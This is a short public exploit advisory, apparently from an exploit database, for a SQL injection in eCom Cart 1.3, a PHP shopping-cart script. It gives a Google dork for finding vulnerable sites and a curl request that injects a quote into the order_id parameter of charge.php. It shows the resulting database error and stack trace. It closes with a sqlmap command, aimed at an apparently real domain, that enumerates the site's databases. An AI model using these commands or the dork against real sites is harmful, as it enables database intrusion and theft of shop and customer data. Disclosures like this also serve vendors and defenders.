# Exploit Title: eCom Cart 1.3 Exploit # Google Dork: inurl:"/pdetails/11" ([11] is variable) # Date: 10.06.2017 # Exploit Author: Alperen Eymen Ozcan & Batuhan Camci # Vendor Homepage: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007 # Software Link: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007 # Version: 1.3 # Tested on: Linux $ curl http://localhost/ecom-cart/charge.php -d order_id=%271 Fatal error: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1'' at line 1 in /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php:16 Stack trace: #0 /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php(16): PDO->query('SELECT * FROM 3...') #1 {main} thrown in /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php on line 16 $ sqlmap -u "http://www.lobisdev.one/ecom-cart/charge.php' --data=order_id=1 --dbs